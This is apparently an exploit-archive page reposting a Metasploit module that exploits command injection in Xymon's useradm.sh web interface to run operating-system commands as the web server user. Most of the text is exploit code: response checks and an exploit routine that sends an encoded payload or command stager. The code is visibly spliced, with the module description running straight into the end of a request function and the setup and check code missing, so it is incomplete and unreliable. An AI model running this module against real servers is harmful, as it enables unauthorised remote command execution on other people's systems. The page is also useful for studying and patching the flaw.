Exploits / Vulnerability Discovered : 2019-07-12 |
Type : remote |
Platform : multiple
This exploit / vulnerability Xymon 4.3.25 useradm command execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Xymon useradm Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability in Xymon
versions before 4.3.25 which allows authenticated users
to execute arbitrary operating system commands as the web
server user.
When adding a new user to the system via the web interface with
`useradm.sh`, the user's username and password are passed to
`htpasswd` in a call to `system()` without validation.
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 401
fail_with(Failure::NoAccess, 'Authentication failed')
end
unless res.code == 500
fail_with(Failure::Unknown, 'Unexpected reply')
end
print_good "#{peer} - Payload sent successfully"
res
end
def exploit
unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if payload.arch.first == 'cmd'
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 1_500)
end
end
end